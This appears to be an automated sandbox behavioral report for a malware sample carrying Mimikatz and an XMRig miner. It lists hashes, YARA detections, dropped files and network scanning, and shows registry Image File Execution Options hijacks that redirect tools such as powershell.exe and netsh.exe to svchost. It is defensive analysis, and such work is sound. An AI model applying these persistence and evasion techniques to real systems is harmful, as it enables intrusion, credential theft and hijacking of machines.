Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:07
Behavioral task
behavioral1
Sample
2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
Resource
win7-20231215-en
General
-
Target
2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
-
Size
8.1MB
-
MD5
994a1dda85a2606649ad14a8a5ca2a83
-
SHA1
c4ffa4a4a6b9d7571be748bf524701f7a0e87d7e
-
SHA256
2334e09bbdba3a24db9c4e469e211b97cc35873f8e379e81073da11214838194
-
SHA512
e54ce8d9e7ee2437f2d7b2a21b590d44437deaf31db5ef637deb9e5041ed2d772d37fe29c0cdde60114448f8e4439a68763f6a128f59479a814507bca3c6e9df
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2788 created 916 2788 bubpucp.exe 20 -
Contacts a large (22071) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
resource yara_rule behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 43 IoCs
resource yara_rule behavioral1/memory/2080-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral1/files/0x000a00000001224c-7.dat UPX behavioral1/memory/2700-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral1/files/0x000a00000001224c-6.dat UPX behavioral1/files/0x000a00000001224c-9.dat UPX behavioral1/files/0x000a00000001224c-5.dat UPX behavioral1/files/0x000a00000001224c-4.dat UPX behavioral1/files/0x0005000000019433-129.dat UPX behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp UPX behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp UPX behavioral1/files/0x0005000000019433-132.dat UPX behavioral1/files/0x0005000000019433-131.dat UPX behavioral1/files/0x0005000000019433-130.dat UPX behavioral1/memory/1816-160-0x000000013F800000-0x000000013F85B000-memory.dmp UPX behavioral1/files/0x0005000000019610-158.dat UPX behavioral1/memory/448-167-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/2788-166-0x0000000002BE0000-0x0000000002D00000-memory.dmp UPX behavioral1/files/0x000500000001950c-164.dat UPX behavioral1/memory/1816-169-0x000000013F800000-0x000000013F85B000-memory.dmp UPX behavioral1/memory/896-179-0x000000013F6F0000-0x000000013F74B000-memory.dmp UPX behavioral1/memory/896-181-0x000000013F6F0000-0x000000013F74B000-memory.dmp UPX behavioral1/memory/628-186-0x000000013FDC0000-0x000000013FE1B000-memory.dmp UPX behavioral1/memory/628-188-0x000000013FDC0000-0x000000013FE1B000-memory.dmp UPX behavioral1/memory/1644-193-0x000000013F550000-0x000000013F5AB000-memory.dmp UPX behavioral1/memory/1644-195-0x000000013F550000-0x000000013F5AB000-memory.dmp UPX behavioral1/memory/448-197-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/2656-202-0x000000013FC60000-0x000000013FCBB000-memory.dmp UPX behavioral1/memory/2656-204-0x000000013FC60000-0x000000013FCBB000-memory.dmp UPX behavioral1/memory/448-207-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/files/0x00050000000194ad-210.dat UPX behavioral1/files/0x00050000000194ad-209.dat UPX behavioral1/memory/448-213-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/2788-215-0x0000000001A80000-0x0000000001ADB000-memory.dmp UPX behavioral1/memory/448-214-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/448-217-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/448-218-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/448-308-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/448-329-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/files/0x00050000000194ad-334.dat UPX behavioral1/memory/448-336-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/448-338-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/448-340-0x000000013F300000-0x000000013F420000-memory.dmp UPX behavioral1/memory/448-341-0x000000013F300000-0x000000013F420000-memory.dmp UPX -
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/448-167-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-197-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-207-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-213-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-214-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-217-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-218-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-308-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-329-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-336-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-338-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-340-0x000000013F300000-0x000000013F420000-memory.dmp xmrig behavioral1/memory/448-341-0x000000013F300000-0x000000013F420000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 12 IoCs
resource yara_rule behavioral1/memory/2080-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x000a00000001224c-7.dat mimikatz behavioral1/memory/2700-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x000a00000001224c-6.dat mimikatz behavioral1/files/0x000a00000001224c-9.dat mimikatz behavioral1/files/0x000a00000001224c-5.dat mimikatz behavioral1/files/0x000a00000001224c-4.dat mimikatz behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp mimikatz behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp mimikatz behavioral1/files/0x00050000000194ad-210.dat mimikatz behavioral1/files/0x00050000000194ad-209.dat mimikatz behavioral1/files/0x00050000000194ad-334.dat mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bubpucp.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts bubpucp.exe -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 2640 netsh.exe 2856 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bubpucp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bubpucp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bubpucp.exe -
Executes dropped EXE 16 IoCs
pid Process 2700 bubpucp.exe 2788 bubpucp.exe 2488 wpcap.exe 1408 znjiklplb.exe 996 vfshost.exe 536 xohudmc.exe 992 rifzsk.exe 1816 lunglbpll.exe 448 bpgzsl.exe 896 lunglbpll.exe 628 lunglbpll.exe 1644 lunglbpll.exe 2656 lunglbpll.exe 320 bubpucp.exe 2980 tnplbywcb.exe 3704 bubpucp.exe -
Loads dropped DLL 22 IoCs
pid Process 2976 cmd.exe 2976 cmd.exe 2396 cmd.exe 2488 wpcap.exe 2488 wpcap.exe 2488 wpcap.exe 2488 wpcap.exe 2488 wpcap.exe 588 cmd.exe 1408 znjiklplb.exe 1408 znjiklplb.exe 1980 cmd.exe 1980 cmd.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 2788 bubpucp.exe 1884 cmd.exe -
resource yara_rule behavioral1/files/0x0005000000019433-129.dat upx behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp upx behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp upx behavioral1/files/0x0005000000019433-132.dat upx behavioral1/files/0x0005000000019433-131.dat upx behavioral1/files/0x0005000000019433-130.dat upx behavioral1/memory/1816-160-0x000000013F800000-0x000000013F85B000-memory.dmp upx behavioral1/files/0x0005000000019610-158.dat upx behavioral1/memory/448-167-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/2788-166-0x0000000002BE0000-0x0000000002D00000-memory.dmp upx behavioral1/files/0x000500000001950c-164.dat upx behavioral1/memory/1816-169-0x000000013F800000-0x000000013F85B000-memory.dmp upx behavioral1/memory/896-179-0x000000013F6F0000-0x000000013F74B000-memory.dmp upx behavioral1/memory/896-181-0x000000013F6F0000-0x000000013F74B000-memory.dmp upx behavioral1/memory/628-186-0x000000013FDC0000-0x000000013FE1B000-memory.dmp upx behavioral1/memory/628-188-0x000000013FDC0000-0x000000013FE1B000-memory.dmp upx behavioral1/memory/1644-193-0x000000013F550000-0x000000013F5AB000-memory.dmp upx behavioral1/memory/1644-195-0x000000013F550000-0x000000013F5AB000-memory.dmp upx behavioral1/memory/448-197-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/2656-202-0x000000013FC60000-0x000000013FCBB000-memory.dmp upx behavioral1/memory/2656-204-0x000000013FC60000-0x000000013FCBB000-memory.dmp upx behavioral1/memory/448-207-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-213-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/2788-215-0x0000000001A80000-0x0000000001ADB000-memory.dmp upx behavioral1/memory/448-214-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-217-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-218-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-308-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-329-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-336-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-338-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-340-0x000000013F300000-0x000000013F420000-memory.dmp upx behavioral1/memory/448-341-0x000000013F300000-0x000000013F420000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ifconfig.me 20 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 bubpucp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BC5F9EEA6885ADA7AD24639E57D2FCB1 bubpucp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BC5F9EEA6885ADA7AD24639E57D2FCB1 bubpucp.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A bubpucp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 bubpucp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A bubpucp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat bubpucp.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\rifzsk.exe xohudmc.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\rifzsk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 bubpucp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bubpucp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 bubpucp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bubpucp.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe bubpucp.exe File created C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\spoolsrv.xml bubpucp.exe File created C:\Windows\ime\bubpucp.exe bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\schoedcl.xml bubpucp.exe File opened for modification C:\Windows\jgebjtcb\vimpcsvc.xml bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\trch-1.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\trfo-2.dll bubpucp.exe File created C:\Windows\lsyqbeqew\Corporate\mimidrv.sys bubpucp.exe File created C:\Windows\lsyqbeqew\ylzbebeqp\ip.txt bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\schoedcl.xml bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\AppCapture64.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\cnli-1.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\schoedcl.exe bubpucp.exe File opened for modification C:\Windows\jgebjtcb\docmicfg.xml bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\spoolsrv.exe bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\docmicfg.xml bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\exma-1.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\svschost.exe bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\AppCapture32.dll bubpucp.exe File created C:\Windows\lsyqbeqew\ylzbebeqp\scan.bat bubpucp.exe File created C:\Windows\jgebjtcb\bubpucp.exe 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\lsyqbeqew\ylzbebeqp\Packet.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\crli-0.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\tibe-2.dll bubpucp.exe File created C:\Windows\jgebjtcb\spoolsrv.xml bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\libeay32.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\spoolsrv.xml bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\vimpcsvc.xml bubpucp.exe File created C:\Windows\jgebjtcb\vimpcsvc.xml bubpucp.exe File opened for modification C:\Windows\jgebjtcb\spoolsrv.xml bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\Shellcode.ini bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\tucl-1.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\docmicfg.exe bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\vimpcsvc.xml bubpucp.exe File opened for modification C:\Windows\lsyqbeqew\ylzbebeqp\Result.txt tnplbywcb.exe File created C:\Windows\lsyqbeqew\ylzbebeqp\Packet.dll bubpucp.exe File created C:\Windows\lsyqbeqew\Corporate\vfshost.exe bubpucp.exe File created C:\Windows\lsyqbeqew\Corporate\mimilib.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\posh-0.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\vimpcsvc.exe bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\svschost.xml bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\docmicfg.xml bubpucp.exe File opened for modification C:\Windows\jgebjtcb\schoedcl.xml bubpucp.exe File opened for modification C:\Windows\jgebjtcb\bubpucp.exe 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe File created C:\Windows\lsyqbeqew\ylzbebeqp\tnplbywcb.exe bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\ssleay32.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\zlib1.dll bubpucp.exe File created C:\Windows\jgebjtcb\svschost.xml bubpucp.exe File created C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\xdvl-0.dll bubpucp.exe File created C:\Windows\jgebjtcb\schoedcl.xml bubpucp.exe File opened for modification C:\Windows\jgebjtcb\svschost.xml bubpucp.exe File created C:\Windows\lsyqbeqew\upbdrjv\swrpwe.exe bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\coli-0.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\libxml2.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\ucl.dll bubpucp.exe File created C:\Windows\lsyqbeqew\UnattendGC\specials\svschost.xml bubpucp.exe File created C:\Windows\jgebjtcb\docmicfg.xml bubpucp.exe File opened for modification C:\Windows\lsyqbeqew\Corporate\log.txt cmd.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1004 sc.exe 592 sc.exe 1992 sc.exe 1244 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 14 IoCs
resource yara_rule behavioral1/files/0x000a00000001224c-7.dat nsis_installer_2 behavioral1/files/0x000a00000001224c-6.dat nsis_installer_2 behavioral1/files/0x000a00000001224c-9.dat nsis_installer_2 behavioral1/files/0x000a00000001224c-5.dat nsis_installer_2 behavioral1/files/0x000a00000001224c-4.dat nsis_installer_2 behavioral1/files/0x0007000000015d70-15.dat nsis_installer_1 behavioral1/files/0x0007000000015d70-15.dat nsis_installer_2 behavioral1/files/0x0007000000015d70-16.dat nsis_installer_1 behavioral1/files/0x0007000000015d70-16.dat nsis_installer_2 behavioral1/files/0x0007000000015d70-14.dat nsis_installer_1 behavioral1/files/0x0007000000015d70-14.dat nsis_installer_2 behavioral1/files/0x00050000000194ad-210.dat nsis_installer_2 behavioral1/files/0x00050000000194ad-209.dat nsis_installer_2 behavioral1/files/0x00050000000194ad-334.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1052 schtasks.exe 2136 schtasks.exe 1624 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-ad-b1-93-64-4b\WpadDecision = "0" bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." bubpucp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings bubpucp.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" bubpucp.exe Key created \REGISTRY\USER\.DEFAULT\Software lunglbpll.exe 